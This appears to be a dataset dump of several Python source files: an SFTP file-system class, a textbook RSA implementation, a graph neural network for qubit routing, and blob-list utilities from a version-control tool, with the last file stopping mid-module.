text stringlengths 957 885k |
|---|
import errno
import logging
import stat
from pathlib import PurePosixPath
from types import TracebackType
from typing import Any, cast, Generator, Iterable, Optional
import paramiko
from cerulean.file_system import FileSystem
from cerulean.file_system_impl import FileSystemImpl
from cerulean.path import AbstractPath, EntryType, Path, Permission
from cerulean.ssh_terminal import SshTerminal
from cerulean.util import BaseExceptionType
logger = logging.getLogger(__name__)
class SftpFileSystem(FileSystemImpl):
    """A FileSystem implementation that connects to an SFTP server.

    SftpFileSystem supports the / operation:

    .. code-block:: python

        fs / 'path'

    which produces a :class:`Path`, through which you can do things
    with the remote files.

    It is also a context manager, so that you can (and should!) use it
    with a ``with`` statement, which will ensure that the connection
    is closed when you are done with the it. Alternatively, you can
    call :meth:`close` to close the connection.

    If `own_term` is True, this class assumes that it owns the terminal
    you gave it, and that it is responsible for closing it when it's
    done with it. If you share an SshTerminal between an SftpFileSystem
    and a scheduler, or use the terminal directly yourself, then you
    want to use False here, and close the terminal yourself when you
    don't need it any more.

    Args:
        terminal: The terminal to connect through.
        own_term: Whether to close the terminal when the file system
            is closed.
    """

    def __init__(self, terminal: SshTerminal, own_term: bool = False) -> None:
        self.__terminal = terminal
        self.__own_term = own_term
        # Open the primary SFTP channel now; True selects the
        # first-connection path (log + connect, no liveness probe).
        self.__ensure_sftp(True)
        # Secondary SFTP channel, created lazily by _streaming_read so
        # that downloads get their own channel/window configuration.
        self.__sftp2 = None  # type: Optional[paramiko.SFTPClient]
        # NOTE(review): __max_tries is not referenced in this class as
        # shown here -- presumably used elsewhere; confirm before removing.
        self.__max_tries = 3

    def __enter__(self) -> 'SftpFileSystem':
        """Enter context manager."""
        return self

    def __exit__(self, exc_type: Optional[BaseExceptionType],
                 exc_value: Optional[BaseException],
                 traceback: Optional[TracebackType]) -> None:
        """Exit context manager."""
        # Only close if we own the terminal; see class docstring.
        if self.__own_term:
            self.close()

    def close(self) -> None:
        """Close the SFTP connection.

        Note: only the primary channel is closed here; the secondary
        streaming channel (if any) is left to the transport teardown.
        """
        self.__sftp.close()
        logger.info('Disconnected from SFTP server')

    def __eq__(self, other: Any) -> bool:
        """Two SftpFileSystems are equal iff they share a terminal."""
        if not isinstance(other, FileSystem):
            return NotImplemented
        if isinstance(other, SftpFileSystem):
            return self.__terminal == other.__terminal
        return False

    def root(self) -> Path:
        """Return a Path for the remote root directory."""
        return Path(self, PurePosixPath('/'))

    def __truediv__(self, segment: str) -> Path:
        """Return an absolute Path for the given path segment."""
        return Path(self, PurePosixPath('/' + segment.strip('/')))

    def _supports(self, feature: str) -> bool:
        """All features in _features are supported by SFTP.

        NOTE(review): _features is presumably defined on FileSystemImpl;
        not visible here -- confirm.
        """
        if feature not in self._features:
            raise ValueError('Invalid argument for "feature"')
        return True

    def _exists(self, path: AbstractPath) -> bool:
        """Return whether the remote path exists (follows symlinks)."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        try:
            self.__sftp.stat(str(lpath))
            return True
        except IOError:
            # stat raises IOError for a missing file; treat as absent.
            return False

    def _mkdir(
            self, path: AbstractPath, mode: Optional[int] = None,
            parents: bool = False, exists_ok: bool = False) -> None:
        """Make a remote directory, optionally with missing parents.

        Note: `mode` is applied only to the leaf directory; parents are
        created with the server's default mode.
        """
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        if parents:
            # parents goes from deepest to shallowest, so reverse it to
            # create shallow directories first.
            for parent in reversed(lpath.parents):
                if not self._exists(parent):
                    self.__sftp.mkdir(str(parent))
        if self._exists(lpath):
            if not exists_ok:
                raise FileExistsError(
                        'File {} exists and exists_ok was False'.format(lpath))
            else:
                return
        if mode is not None:
            self.__sftp.mkdir(str(lpath), mode)
        else:
            self.__sftp.mkdir(str(lpath))

    def _iterdir(
            self, path: AbstractPath) -> Generator[PurePosixPath, None, None]:
        """Yield the entries of a remote directory as full paths."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        # Note: we're not using listdir_iter here, because it hangs:
        # https://github.com/paramiko/paramiko/issues/1171
        try:
            for entry in self.__sftp.listdir(str(lpath)):
                yield lpath / entry
        except OSError as e:
            # Paramiko omits the filename, which breaks Path.walk()
            # so add it back in here.
            raise OSError(e.errno, e.strerror, str(lpath))

    def _rmdir(self, path: AbstractPath, recursive: bool = False) -> None:
        """Remove a remote directory; a no-op if it does not exist.

        Raises:
            RuntimeError: If the path exists but is not a directory.
        """
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        if not self._exists(lpath):
            return
        if not self._is_dir(lpath):
            raise RuntimeError("Path must refer to a directory")
        if recursive:
            for entry in self.__sftp.listdir_attr(str(lpath)):
                entry_path = lpath / entry.filename
                # Check symlink first so we never recurse through a
                # link into a directory outside this tree.
                if self._is_symlink(entry_path):
                    self.__sftp.unlink(str(entry_path))
                elif self._is_dir(entry_path):
                    self._rmdir(entry_path, True)
                else:
                    self.__sftp.unlink(str(entry_path))
        self.__sftp.rmdir(str(lpath))

    def _touch(self, path: AbstractPath) -> None:
        """Create the remote file if needed, like touch(1)."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        # Opening for append creates the file without truncating it.
        with self.__sftp.file(str(lpath), 'a'):
            pass

    def _streaming_read(
            self, path: AbstractPath) -> Generator[bytes, None, None]:
        """Yield the remote file's contents in 24 KiB chunks.

        Uses a dedicated second SFTP channel (sftp2) with prefetching,
        which measured faster for downloads; see table below.
        """
        # Buffer size vs. speed (MB/s) against localhost
        #           up      down    local
        # 8k        33      56      159
        # 16k       52      56      145
        # 24k       66      57      150
        # 32k       24      57      149
        # 2M        24      48
        # scp       120     110
        # cp                        172
        def ensure_sftp2(self: 'SftpFileSystem') -> None:
            # Mirror of __ensure_sftp, but for the download channel:
            # create it lazily, then probe liveness and reconnect if the
            # socket or transport has gone away.
            if self.__sftp2 is None:
                self.__sftp2 = self.__terminal._get_downstream_sftp_client()
            else:
                try:
                    self.__sftp2.lstat('/')
                except OSError as e:
                    if 'Socket is closed' in str(e):
                        self.__sftp2 = self.__terminal._get_downstream_sftp_client()
                    else:
                        raise
                channel = self.__sftp2.get_channel()
                if not (channel and channel.get_transport().is_active()):
                    self.__sftp2 = self.__terminal._get_downstream_sftp_client()

        lpath = cast(PurePosixPath, path)
        ensure_sftp2(self)
        try:
            size = self._size(path)
            with self.__sftp2.file(str(lpath), 'rb') as f:  # type: ignore
                # Prefetch the whole file to pipeline read requests.
                f.prefetch(size)
                data = f.read(24576)
                while len(data) > 0:
                    yield data
                    data = f.read(24576)
        except paramiko.SSHException as e:
            # Translate a dropped connection into a standard error type.
            if 'Server connection dropped' in str(e):
                raise ConnectionError(e)
            else:
                raise e

    def _streaming_write(
            self, path: AbstractPath, data: Iterable[bytes]) -> None:
        """Write the given chunks of bytes to the remote file."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        try:
            with self.__sftp.file(str(lpath), 'wb') as f:
                # Pipelining avoids a round-trip per write request.
                f.set_pipelined(True)
                for chunk in data:
                    f.write(chunk)
        except paramiko.SSHException as e:
            if 'Server connection dropped' in str(e):
                raise ConnectionError(e)
            else:
                raise e

    def _rename(self, path: AbstractPath, target: AbstractPath) -> None:
        """Rename a remote file with POSIX semantics (overwrites target)."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        ltarget = cast(PurePosixPath, target)
        self.__sftp.posix_rename(str(lpath), str(ltarget))

    def _unlink(self, path: AbstractPath) -> None:
        """Remove a remote file."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        self.__sftp.unlink(str(lpath))

    def _is_dir(self, path: AbstractPath) -> bool:
        """Return whether the path refers to a directory (follows links)."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        try:
            mode = self.__stat(lpath).st_mode
            return mode is not None and bool(stat.S_ISDIR(mode))
        except FileNotFoundError:
            return False

    def _is_file(self, path: AbstractPath) -> bool:
        """Return whether the path refers to a regular file (follows links)."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        try:
            mode = self.__stat(lpath).st_mode
            return mode is not None and bool(stat.S_ISREG(mode))
        except FileNotFoundError:
            return False

    def _is_symlink(self, path: AbstractPath) -> bool:
        """Return whether the path itself is a symbolic link (uses lstat)."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        try:
            mode = self.__lstat(lpath).st_mode
            return mode is not None and bool(stat.S_ISLNK(mode))
        except FileNotFoundError:
            return False

    def _entry_type(self, path: AbstractPath) -> EntryType:
        """Return the type of directory entry the path refers to.

        Raises:
            OSError: With ENOENT if the path does not exist.
        """
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        # Ordered list of (mode predicate, entry type) pairs; the first
        # matching predicate wins.
        mode_to_type = [(stat.S_ISDIR, EntryType.DIRECTORY),
                        (stat.S_ISREG, EntryType.FILE),
                        (stat.S_ISLNK, EntryType.SYMBOLIC_LINK),
                        (stat.S_ISCHR, EntryType.CHARACTER_DEVICE),
                        (stat.S_ISBLK, EntryType.BLOCK_DEVICE),
                        (stat.S_ISFIFO, EntryType.FIFO),
                        (stat.S_ISSOCK, EntryType.SOCKET)]
        try:
            mode = self.__lstat(lpath).st_mode
        except IOError:
            raise OSError(errno.ENOENT, 'No such file or directory',
                          str(lpath))
        for predicate, result in mode_to_type:
            if mode is not None and predicate(mode):
                return result
        raise RuntimeError('Object is of unknown type, please report a'
                           'Cerulean bug')

    def _size(self, path: AbstractPath) -> int:
        """Return the size of the remote file in bytes."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        size = self.__stat(lpath).st_size
        if size is None:
            raise RuntimeError('Server did not return size')
        return size

    def _uid(self, path: AbstractPath) -> int:
        """Return the UID of the remote file's owner."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        uid = self.__stat(lpath).st_uid
        if uid is None:
            raise RuntimeError('Server did not return a UID')
        return uid

    def _gid(self, path: AbstractPath) -> int:
        """Return the GID of the remote file's group."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        gid = self.__stat(lpath).st_gid
        if gid is None:
            raise RuntimeError('Server did not return a GID')
        return gid

    def _has_permission(
            self, path: AbstractPath, permission: Permission) -> bool:
        """Return whether the file mode has the given permission bit set."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        mode = self.__stat(lpath).st_mode
        if mode is None:
            raise RuntimeError('Server did not return file mode')
        return bool(mode & permission.value)

    def _set_permission(
            self, path: AbstractPath, permission: Permission,
            value: bool = True) -> None:
        """Set or clear a single permission bit on the remote file."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        mode = self.__stat(lpath).st_mode
        if mode is None:
            raise RuntimeError('Server did not return file mode')
        if value:
            mode = mode | permission.value
        else:
            mode = mode & ~permission.value
        self._chmod(lpath, mode)

    def _chmod(self, path: AbstractPath, mode: int) -> None:
        """Set the remote file's mode bits."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        self.__sftp.chmod(str(lpath), mode)

    def _symlink_to(self, path: AbstractPath, target: AbstractPath) -> None:
        """Create a symlink at `path` pointing at `target`."""
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        ltarget = cast(PurePosixPath, target)
        # Note paramiko's argument order: (link contents, link location).
        self.__sftp.symlink(str(ltarget), str(lpath))

    def _readlink(self, path: AbstractPath, recursive: bool) -> Path:
        """Return the target of a symlink.

        With recursive=True the chain of links is followed (up to 32
        hops) and the final, normalized target is returned.
        """
        self.__ensure_sftp()
        lpath = cast(PurePosixPath, path)
        if recursive:
            # SFTP's normalize() raises if there's a link loop or a
            # non-existing target, which we don't want, so we use
            # our own algorithm.
            max_iter = 32
            cur_path = lpath
            iter_count = 0
            while self._is_symlink(cur_path) and iter_count < max_iter:
                target_str = self.__sftp.readlink(str(cur_path))
                if target_str is None:
                    raise RuntimeError('Server error while reading link')
                target = PurePosixPath(target_str)
                if not target.is_absolute():
                    # Relative link targets are resolved against the
                    # directory containing the link.
                    target = cur_path.parent / target
                cur_path = target
                iter_count += 1
            if iter_count == max_iter:
                raise RuntimeError('Too many symbolic links detected')
            target = PurePosixPath(self.__sftp.normalize(str(path)))
        else:
            target_str = self.__sftp.readlink(str(path))
            if target_str is None:
                raise RuntimeError('Server error while reading link')
            target = PurePosixPath(target_str)
            if not target.is_absolute():
                target = lpath.parent / target
        return Path(self, target)

    def __lstat(self, path: PurePosixPath) -> paramiko.SFTPAttributes:
        # stat() that does not follow symlinks.
        return self.__sftp.lstat(str(path))

    def __stat(self, path: PurePosixPath) -> paramiko.SFTPAttributes:
        # stat() that follows symlinks.
        return self.__sftp.stat(str(path))

    def __ensure_sftp(self, first: bool = False) -> None:
        # Ensure the primary SFTP channel is connected and alive.
        # On the first call we just connect; afterwards we probe with a
        # cheap lstat('/') and reconnect if the socket or the underlying
        # transport has died.
        if first:
            logger.info('Connecting to SFTP server')
            self.__sftp = self.__terminal._get_sftp_client()
            logger.info('Connected to SFTP server')
        else:
            try:
                self.__sftp.lstat('/')
            except OSError as e:
                if 'Socket is closed' in str(e):
                    logger.info('Reconnecting to SFTP server')
                    self.__sftp = self.__terminal._get_sftp_client()
                    logger.info('Connected to SFTP server')
                else:
                    raise
            channel = self.__sftp.get_channel()
            if not (channel and channel.get_transport().is_active()):
                logger.info('Reconnecting to SFTP server')
                self.__sftp = self.__terminal._get_sftp_client()
                logger.info('Connected to SFTP server')
|
<filename>crypto/algorithms/purersa.py<gh_stars>1-10
__author__ = 'bsoer'
from crypto.algorithms.algorithminterface import AlgorithmInterface
from tools.argparcer import ArgParcer
import tools.rsatools as RSATools
import math
import sys
class PureRSA(AlgorithmInterface):
    """Textbook ("pure") RSA built from two user-supplied primes.

    Key material is derived in __init__ from -p1 and -p2; the public key
    is exchanged as the string "<len(e)>:<e><n>" and messages are
    encrypted segment-by-segment with classic modular exponentiation.

    NOTE(review): self.logger is used but never assigned in this class;
    presumably AlgorithmInterface provides it -- confirm.
    """
    n = None                 # modulus p1 * p2
    totient = None           # (p1 - 1) * (p2 - 1)
    e = None                 # public exponent
    d = None                 # private exponent
    publicKey = None         # serialized "<len(e)>:<e><n>"
    privateKey = None        # serialized "<len(d)>:<d><n>"
    other_publicKey = None   # peer's serialized public key
    other_e = 0              # peer's public exponent
    other_n = 0              # peer's modulus

    def __init__(self, arguments):
        """Derive all RSA key components from the -p1/-p2 arguments.

        Raises:
            AttributeError: If either prime argument is missing.
        """
        prime1 = ArgParcer.getValue(arguments, "-p1")
        prime2 = ArgParcer.getValue(arguments, "-p2")
        if prime1 == "" or prime2 == "":
            raise AttributeError("Two Prime Number Parameters -p1 and -p2 are required to use PureRSA Encryption")
        else:
            intPrime1 = int(prime1)
            intPrime2 = int(prime2)
            # calculate all components
            self.n = intPrime1 * intPrime2
            self.totient = (intPrime1 - 1)*(intPrime2-1)
            if intPrime1 > intPrime2:
                self.e = RSATools.findCoPrimeToTotient(self.totient, intPrime1)
            else:
                self.e = RSATools.findCoPrimeToTotient(self.totient, intPrime2)
            self.d = RSATools.findDFromTotientAndE(self.totient, self.e)
            # e and n make our public key
            # were going to arbitrarily format our public key
            # <eLength>:<eValue><nValue>
            strE = str(self.e)
            strELen = len(strE)
            self.publicKey = str(strELen) + ":" + strE + str(self.n)
            # d and n make our private key
            strD = str(self.d)
            strDLen = len(strD)
            self.privateKey = str(strDLen) + ":" + strD + str(self.n)

    def sendFirstMessage(self):
        """Send our serialized public key as the handshake message."""
        return self.publicKey.encode()

    def receiveFirstMessage(self, firstMessage):
        """Parse the peer's public key ("<len(e)>:<e><n>") from the handshake."""
        self.other_publicKey = firstMessage.decode()
        colonIndex = self.other_publicKey.index(':')
        strELen = self.other_publicKey[0:colonIndex]
        eLen = int(strELen)
        strE = self.other_publicKey[colonIndex+1:colonIndex + 1 + eLen]
        self.other_e = int(strE)
        strN = self.other_publicKey[colonIndex+1+eLen:]
        self.other_n = int(strN)
        self.logger.debug("Received Public Key Values: N " + str(self.other_n) + ", E " + str(self.other_e))
        return False # return true for debug to display public key

    def encryptString(self, unencryptedMessage):
        """Encrypt a string with the peer's public key, returning bytes.

        The message is rendered as a bit string, zero-padded, split into
        floor(log2(n))-bit segments, and each segment is encrypted as
        c = m^e mod n, emitted as a ceil(log2(n))-bit field.
        """
        plaintext_message_seg_length = int(math.floor(math.log(float(self.other_n), 2)))
        encrypted_message_seg_length = int(math.ceil(math.log(float(self.other_n), 2)))
        self.logger.debug("Based On Key Parameters, the maximum message lengths are as follows: Plaintext: "
                          + str(plaintext_message_seg_length) + " Ciphertext: " + str(encrypted_message_seg_length))
        # convert the message to all binary bits - padd out to make sure they all are 8 bits long for the character
        binaryUnencryptedMessage = ''.join(format(ord(x), '08b') for x in unencryptedMessage)
        self.logger.debug(binaryUnencryptedMessage)
        # post pad the string to get an even number
        while len(binaryUnencryptedMessage) % plaintext_message_seg_length != 0:
            binaryUnencryptedMessage += '0'
        self.logger.debug(binaryUnencryptedMessage)
        # split it up into segments of plaintext_message_seg_length
        unencryptedMessageSegments = list()
        for i in range(0, len(binaryUnencryptedMessage), plaintext_message_seg_length):
            unencryptedMessageSegments.append(binaryUnencryptedMessage[i: i + plaintext_message_seg_length])
        self.logger.debug(unencryptedMessageSegments)
        # encrypt each segment using RSA
        encryptedMessageSegments = list()
        for i in unencryptedMessageSegments:
            segmentInt = int(i, 2)  # converts string to int, interpreting it as in base 2
            # Use 3-argument pow() for modular exponentiation: it reduces
            # at every step instead of materializing the astronomically
            # large segmentInt ** e intermediate. Result is identical.
            encryptedSegmentInt = pow(segmentInt, self.other_e, self.other_n)
            encryptedSegmentBinary = format(encryptedSegmentInt, '0' + str(encrypted_message_seg_length) + 'b')
            encryptedMessageSegments.append(encryptedSegmentBinary)
        self.logger.debug(encryptedMessageSegments)
        encryptedMessageBinaryString = ''.join(encryptedMessageSegments)
        self.logger.debug(encryptedMessageBinaryString)
        encryptedMessageInt = int(encryptedMessageBinaryString, 2)
        self.logger.debug(encryptedMessageInt)
        self.logger.debug(bin(encryptedMessageInt))
        encryptedMessage = encryptedMessageInt.to_bytes(byteorder=sys.byteorder,
                                                        length=math.ceil(len(encryptedMessageBinaryString) / 8))
        return encryptedMessage

    def decryptString(self, encryptedMessage):
        """Decrypt bytes produced by a peer's encryptString() into a string.

        Mirrors encryptString: the ciphertext is split into
        ceil(log2(n))-bit segments, each decrypted as m = c^d mod n, and
        the recovered bit string is decoded 8 bits per character.
        """
        plaintext_message_seg_length = int(math.floor(math.log(self.n, 2)))
        encrypted_message_seg_length = int(math.ceil(math.log(self.n, 2)))
        self.logger.debug("Based On Key Parameters, the maximum message lengths are as follows: Plaintext: "
                          + str(plaintext_message_seg_length) + " Ciphertext: " + str(encrypted_message_seg_length))
        number = int.from_bytes(encryptedMessage, byteorder=sys.byteorder, signed=False)
        self.logger.debug(number)
        binaryEncryptedMessage = str(bin(number))[2:]
        self.logger.debug(binaryEncryptedMessage)
        # Restore leading zero bits lost by bin().
        while len(binaryEncryptedMessage) % encrypted_message_seg_length != 0:
            binaryEncryptedMessage = '0' + binaryEncryptedMessage
        encryptedMessageSegments = list()
        for i in range(0, len(binaryEncryptedMessage), encrypted_message_seg_length):
            encryptedMessageSegments.append(binaryEncryptedMessage[i: i + encrypted_message_seg_length])
        self.logger.debug(encryptedMessageSegments)
        unencryptedSegments = list()
        for i in encryptedMessageSegments:
            segmentInt = int(i, 2)  # converts string to int, interpreting it as in base 2
            # 3-argument pow() -- see encryptString for rationale.
            unencryptedSegmentInt = pow(segmentInt, self.d, self.n)
            unencryptedSegmentBinary = format(unencryptedSegmentInt, '0' + str(plaintext_message_seg_length) + 'b')
            unencryptedSegments.append(unencryptedSegmentBinary)
        self.logger.debug(unencryptedSegments)
        joinedSegments = ''.join(unencryptedSegments)
        self.logger.debug(joinedSegments)
        letters = list()
        for i in range(0, len(joinedSegments), 8):
            letters.append(joinedSegments[i: i + 8])
        self.logger.debug(letters)
        plainMessage = ""
        for letter in letters:
            letterInt = int(letter, 2)
            character = chr(letterInt)
            plainMessage += character
        return plainMessage
|
<filename>qroute/models/graph_dual.py
import typing
import numpy as np
import torch
import torch_geometric
from ..environment.device import DeviceTopology
from ..environment.state import CircuitStateDQN
class NormActivation(torch.nn.Module):
    """Square the input element-wise and normalize along ``dim``.

    The output is non-negative and sums to 1 along ``dim``, turning an
    arbitrary real vector into a probability-like distribution.
    """

    def __init__(self, dim=-1):
        super().__init__()
        self.dim = dim

    def forward(self, tensor):
        squared = tensor * tensor
        total = squared.sum(dim=self.dim, keepdim=True)
        return squared / total
class GraphDualModel(torch.nn.Module):
    """Dual-headed (value + policy) graph network over a device topology.

    Node features are mixed with an EdgeConv over the device's coupling
    graph; the flattened result feeds a value head (scalar) and a policy
    head (one probability per device edge, plus an optional stop move).
    """

    def __init__(self, device: DeviceTopology, stop_move: bool = False):
        """
        Create the decision model for the given device topology
        :param device: the device object on which the agent should propose actions
        """
        super(GraphDualModel, self).__init__()
        self.device = device
        # Shared MLP used by EdgeConv: input is the concatenated feature
        # pairs of each edge's endpoints (2 * len(device)), output is a
        # 4-dim embedding per node.
        mlp = torch.nn.Sequential(
            torch.nn.Linear(len(self.device) * 2, 50),
            torch.nn.SiLU(),
            torch.nn.Linear(50, 10),
            torch.nn.SiLU(),
            torch.nn.Linear(10, 4),
            torch.nn.SiLU(),
        )
        self.edge_conv = torch_geometric.nn.EdgeConv(aggr='add', nn=mlp)
        # Edge index in (2, num_edges) layout as torch_geometric expects.
        self.edges = torch.tensor(self.device.edges).transpose(1, 0)
        # Value head input: node embeddings + remaining targets + edge locks.
        self.value_head = torch.nn.Sequential(
            torch.nn.Linear(len(self.device) * 4 + len(self.device) + len(self.device.edges), 64),
            torch.nn.SiLU(),
            torch.nn.Linear(64, 16),
            torch.nn.SiLU(),
            torch.nn.Linear(16, 1),
        )
        # Policy head input: node embeddings + edge locks; one output per
        # edge, plus one extra output when the stop move is enabled.
        self.policy_head = torch.nn.Sequential(
            torch.nn.Linear(len(self.device) * 4 + len(self.device.edges),
                            len(self.device.edges) + (1 if stop_move else 0)),
            NormActivation(dim=-1),
        )
        self.optimizer = torch.optim.Adam(self.parameters())

    def forward(self, state: CircuitStateDQN) -> typing.Tuple[torch.Tensor, torch.Tensor]:
        """
        The callable for the model, does the forward propagation step
        :param state: input state of the circuit
        :return: the probability of each of the actions and value function for state

        Note: despite the name order in the docstring, the return order
        is (value, policy).
        """
        x, remaining, locks = self.get_representation(state)
        x = self.edge_conv(x, self.edges)
        x = x.view(-1)
        value_input = torch.cat([x, remaining, locks])
        policy_input = torch.cat([x, locks])
        policy = self.policy_head(policy_input)
        value: torch.Tensor = self.value_head(value_input)
        # policy[-1] = -1e10  FIXME: Force this constraint for all other functions
        return value, policy

    def get_representation(self, state: CircuitStateDQN):
        """
        Obtains the state representation
        :param state: the state of the circuit right now
        :return: (interaction map, remaining targets, mutex locks) tensors
        """
        nodes_to_target_nodes = state.target_nodes
        # One-hot interaction map: row idx has a 1 in the column of its
        # target node; -1 means "no target" and leaves the row zero.
        interaction_map = torch.zeros((len(self.device), len(self.device)))
        for idx, target in enumerate(nodes_to_target_nodes):
            if target == -1:
                continue
            interaction_map[idx, target] = 1
        remaining_targets = torch.from_numpy(state.remaining_targets)
        mutex_locks = torch.from_numpy(state.locked_edges)
        return interaction_map, remaining_targets, mutex_locks

    @staticmethod
    def _loss_p(predicted, target):
        # Cross-entropy against the target distribution; the 1e-8 avoids
        # log(0) for zero-probability actions.
        loss = torch.sum(-target * ((1e-8 + predicted).log()))
        return loss

    @staticmethod
    def _loss_v(predicted, target):
        # Mean squared error on the value estimate.
        criterion = torch.nn.MSELoss()
        loss = criterion(predicted, target)
        return loss

    def fit(self, state, v, p):
        """One optimization step on a single (state, value, policy) sample.

        :return: (value loss, policy loss) as Python floats
        """
        self.optimizer.zero_grad()
        self.train()
        v = v.reshape(1)
        pred_v, pred_p = self(state)
        v_loss = self._loss_v(pred_v, v)
        p_loss = self._loss_p(pred_p, p)
        loss = v_loss + p_loss
        loss.backward()
        self.optimizer.step()
        return v_loss.item(), p_loss.item()
|
<reponame>jhnphm/boar<gh_stars>0
# -*- coding: utf-8 -*-
# Copyright 2011 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
import os, re
from common import *
from treecomp import TreeComparer
def safe_delete_file(path):
    """This function behaves like os.remove(), except for filenames
    that looks like they may be part of vital session data. If such a
    filename is given as argument, an AssertionError will be raised
    and the file will not be deleted."""
    path = os.path.normcase(path)
    name = os.path.basename(path)
    protected = ("bloblist.json", "session.json", "session.md5")
    # Check order matters only for which assertion message is reported.
    assert not is_md5sum(name), "safe_delete prevented deletion of blob"
    assert not is_recipe_filename(name), "safe_delete prevented deletion of recipe"
    assert name not in protected, "safe_delete prevented deletion of session data"
    assert not name.endswith(".fingerprint"), "safe_delete prevented deletion of session fingerprint"
    os.remove(path)
def safe_delete_recipe(path):
    """Delete *path*, asserting first that it is named like a recipe file."""
    normalized = os.path.normcase(path)
    name = os.path.basename(normalized)
    assert is_recipe_filename(name), "safe_delete_recipe can only delete recipes"
    os.remove(normalized)
def safe_delete_blob(path):
    """Delete *path*, asserting first that it is named like a blob
    (an md5sum). Raises AssertionError otherwise."""
    path = os.path.normcase(path)
    filename = os.path.basename(path)
    # Fixed copy-paste error: the message previously referred to
    # safe_delete_recipe.
    assert is_md5sum(filename), "safe_delete_blob can only delete blobs"
    os.remove(path)
def unsafe_delete(path):
    # Deletes without any of the safe_delete_* checks -- caller takes
    # full responsibility for what is being removed.
    os.remove(path)
def bloblist_to_dict(bloblist):
    """Returns the bloblist as a dict on the form filename ->
    blobinfo."""
    blobdict = dict((entry['filename'], entry) for entry in bloblist)
    # Equal sizes means no filename appeared twice.
    assert len(blobdict) == len(bloblist), "Duplicate filename in bloblist"
    return blobdict
def treecompare_bloblists(from_bloblist, to_bloblist):
    """Constructs and returns a TreeComparer instance using the
    filenames and md5sums found in the given bloblist entries."""
    def as_md5_map(bloblist):
        # filename -> md5sum, rejecting duplicate filenames.
        md5_map = dict((entry['filename'], entry['md5sum'])
                       for entry in bloblist)
        assert len(md5_map) == len(bloblist), "Duplicate filename in bloblist"
        return md5_map
    return TreeComparer(as_md5_map(from_bloblist), as_md5_map(to_bloblist))
def bloblist_delta(from_bloblist, to_bloblist):
    """ Calculate a delta bloblist given two complete bloblists.

    The delta contains {"action": "remove", "filename": ...} entries for
    deleted files, and full blobinfo entries for new/modified files; it
    can be re-applied with apply_delta().
    """
    tc = treecompare_bloblists(from_bloblist, to_bloblist)
    to_dict = bloblist_to_dict(to_bloblist)
    delta = []
    for fn in tc.all_changed_filenames():
        if tc.is_deleted(fn):
            # Deleted files become explicit "remove" actions.
            delta.append({"action": "remove", "filename": fn})
        else:
            # New or modified files carry their full blobinfo.
            delta.append(to_dict[fn])
    return delta
def apply_delta(bloblist, delta):
    """ Apply a delta bloblist to a original bloblist, yielding a
    resulting bloblist.

    Delta entries either carry "action": "remove" or are complete
    blobinfo entries that replace or extend the base list.
    """
    # The base list must be action-free; the delta may only hold
    # "remove" actions (or plain entries with no action at all).
    for entry in bloblist:
        assert "action" not in entry
    for entry in delta:
        assert entry.get("action", None) in (None, "remove")
    removed = set(entry['filename'] for entry in delta
                  if entry.get("action", None) == "remove")
    replacements = bloblist_to_dict(
        [entry for entry in delta if "action" not in entry])
    result = []
    for entry in bloblist:
        filename = entry['filename']
        if filename in removed:
            continue
        if filename in replacements:
            # Modified file: swap in the updated entry.
            result.append(replacements.pop(filename))
        else:
            result.append(entry)
    # Anything left over in replacements is a brand-new file.
    result += replacements.values()
    return result
def invert_bloblist(bloblist):
    """ Returns a dictionary on the form md5sum -> [blobinfo,
    blobinfo, ...] """
    result = {}
    for bi in bloblist:
        # setdefault creates the bucket on first sight of each md5sum.
        result.setdefault(bi['md5sum'], []).append(bi)
    return result
def sorted_bloblist(bloblist):
    """Return a new list of the bloblist entries sorted by filename.

    The original passed a Python-2-style cmp function positionally to
    sorted(); a key function produces the same ordering and also works
    on Python 3, where the cmp parameter no longer exists.
    """
    return sorted(bloblist, key=lambda bi: bi['filename'])
def parse_manifest_name(path):
    """Returns a tuple (lowercase hash name, hash). Both are None if
    the path is not a valid manifest filename.

    Accepted forms: "manifest-<hashname>.txt", "manifest-<md5>.md5" and
    plain "manifest.md5" (case-insensitive), optionally preceded by a
    directory path.
    """
    # Fixed: the pattern is now a raw string and the literal dots in
    # ".txt" and "manifest.md5" are escaped -- previously "." matched
    # any character, so e.g. "manifest-md5xtxt" was wrongly accepted.
    m = re.match(r"(^|.*/)(manifest-([a-z0-9]+)\.txt|manifest-([a-z0-9]{32})\.md5|(manifest\.md5))", path, flags=re.IGNORECASE)
    if not m:
        return None, None
    if m.group(5):
        # Plain "manifest.md5": hash name known, hash value not.
        return "md5", None
    if m.group(3):
        # "manifest-<hashname>.txt" form.
        hashname = m.group(3).lower()
        return hashname, None
    # "manifest-<32 hex chars>.md5" form: md5 with an embedded hash.
    hashname = "md5"
    manifest_hash = m.group(4).lower()
    return hashname, manifest_hash
# Import-time sanity checks for parse_manifest_name(); these run once
# when the module is loaded and guard against regex regressions.
assert parse_manifest_name("/tmp/manifest.md5") == ("md5", None)
